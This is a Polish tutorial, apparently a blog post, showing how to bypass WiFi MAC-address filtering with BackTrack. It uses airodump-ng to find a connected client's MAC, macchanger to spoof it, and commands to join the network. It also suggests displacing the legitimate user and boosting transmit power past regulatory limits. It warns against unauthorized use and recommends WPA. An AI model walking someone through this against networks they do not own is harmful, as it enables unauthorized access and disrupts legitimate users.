Filtrowanie MAC – obejście zabezpieczenia – BackTrack

Artykuł ten napisany jest aby uświadomić wszystkim, jakim słabym zabezpieczeniem jest filtrowanie MAC adresów w sieci WIFI. Jednocześnie informuję, iż podłączanie się do cudzej sieci bez zgody administratora (właściciela) jest zabronione.

Na początek parę słów teorii.

Thank you for reading this post, don't forget to subscribe!

MAC adres – jest to sprzętowy adres karty sieciowej, unikatowy w skali światowej, nadawany przez producenta danej karty podczas produkcji. Jest zbudowany z 48 bitów, zapisywanych szesnastkowo – z czego pierwsze 24 bity oznaczają producenta a pozostałe 24 bity oznaczają unikatowy nr urządzenia. Przykład MAC adresu: 00:0A:E6:3E:DD:E5. Z czego 00:0A:E6 to oznaczenie producenta, a 3E:DD:E5 to unikatowy nr. nadawany przez tego producenta.

Filtrowanie MAC – zabezpieczenie sieci wifi, polegające na kontrolowaniu dostępu komputerów łączących się z siecią wifi za pomocą MAC adresu karty sieciowej. W przykładzie: Posiadamy router i do jego “white-listy” dodajemy adresy MAC które mogą korzystać z połączenia, wszystkie inne urządzenia, które nie są wykazane w “white-list’cie” nie uzyskają połączenia z internetem.

Obejście zabezpieczenia filtracji MAC adresów.

Jak już wcześniej napisałem MAC adres jest z góry nadawany przez producenta, a skoro tak jest pewnie wiekszość ludzi myśli, że nie da się go zmienić.. I mają racje:) Jednakże jest pewne ale. MAC’a nie da się zmienić na stałe, ale da się zmienić tymczasowo, na czas np. bieżącej sesji. Służy do tego między innymi program macchanger w backtracku.

OK.. Więc do dzieła.
Warto najpierw zapoznać się z moim artykułem BackTrack – łączenie z niezabezpieczoną siecią. a następnie przejść do punktów opisanych tu – ponieważ nie będę tym razem opisywał co do czego służy:).

Kilka danych:

  • wlan1 – interfejs mojej karty
  • link – essid mojej sieci do której bedziemy się łączyć (stworzonej na potrzeby artykułu)
  • 11 – kanał na którym pracuje sieć

Krok 1.

Włączamy konsole linuxa. Wpisujemy kolejno komendy.

  • ifconfig – szukany jaki interfejs ma nasza karta
  • ifconfig wlan1 down – wyłączamy naszą kartę,
  • iwconfig wlan1 mode monitor – ustawiamy tryb nasłuchu na karcie,
  • ifconfig wlan1 up – włączamy kartę,
  • airodump-ng wlan1 – zaczynamy "snifować / węszyć" sieć

Krok 2.

Znaleźliśmy naszą wcześniej przygotowaną sieć “link”
Adres akces pointa znajduje się w kolumnie BSSID: w naszym przypadku to: XX:1D:XX:AD:XX:04
teraz patrzymy na kolejną tabelkę która informuje jakie urządzenia w sieci podłączone są do jakch sieci. Wyszykujemy w niej adres BSSID sieci : “link” a nastempnie widzimy i sprawdzamy jakie urządzenie jest do niej podpięte (jaki mac adres), w naszym przypadku to: XX:1C:XX:81:XX:B5.

Krok 3.

Teraz już wystarczy, albo poczekać aż dany użytkownik z Mac adresem XX:1C:XX:81:XX:B5 się rozłączy, i wtedy próbować sie podłączyć, albo jeśli mamy mocny sygnał, “wyprzeć” go z sieci ( oczywiście fakt ten na pewno dany użytkownik zauważy, bo go rozłączy:)

w obu przypadkach korzystamy z programu macchanger, wpisując w konsolę polecenie:

#macchanger -m XX:1C:XX:81:XX:B5 wlan1 – ogólna składnia to macchanger -m [adres mac] [interfejs karty]

Oczywiście z góry informuję, iż nie wszystkie karty pozwalają na zmianę MAC adresu – tak więc proszę nie pytać dlaczego nie wychodzi.
Rezultatem wpisania tej komendy powinna być informacja:

Current MAC: 00:00:2S:32:22:DC – (nasz stary mac adres)
Faked MAC: XX:1C:XX:81:XX:B5 – (nasz nowy podmieniony adres – który jest wykazywany w otoczeniu)

..

Krok 4.

Teraz wystarczy postępować już zgodnie z poleceniami/krokami z artykułu: BackTrack – łączenie z niezabezpieczoną siecią. czyli:

  • #ifconfig wlan1 down – wyłączamy kartę
  • #iwconfig wlan1 mode managed – ustawiamy tryb managed
  • #iwconfig wlan1 essid link – ustawiamy nazwę sieci
  • #iwconfig wlan1 channel 11 – ustawiamy kanał sieci
  • #ifconfig wlan1 up – włączamy kartę
  • #dhclient wlan1 – ustawiamy połączenie internetowe

po tych operacjach powinniśmy uzyskac dostęp do internetu danej sieci.
Jeśli się nie udało, to może być kilka powodów np,:
– za słaby sygnał
– za słaba jakość połączenia

Możemy jeszcze spróbować w ostateczności zwiększyć moc naszej karty, aby polepszyć te parametry.
Jednak odrazu mówię, iż takie działanie może prowadzić do uszkodzenia naszej karty.
Tak więc operacje poniżej wykonujecie tylko na własną odpowiedzialność:

Wyłączamy kartę i w konsole wpisujemy:

#iw reg set BO
#iwconfig wlan1 txpower 30

Te dwa wiersze poleceń spowodują zwiększenie mocy naszej karty z bieżącej do 30 dBm tak więc wartość 30 ustawia nam moc – lepiej więc nie wpisywac zbyt dużej cyfry.

Następnie ponawiamy wszystkie czynności od kroku 3.
——-

Teraz już widzicie jakim słabym zabezpieczeniem jest filtrowanie MAC. Warto/dobrze go używać, ale tylko w przypadku gdy korzystamy z innych – o wiele mocniejszych zabezpieczeń np. WPA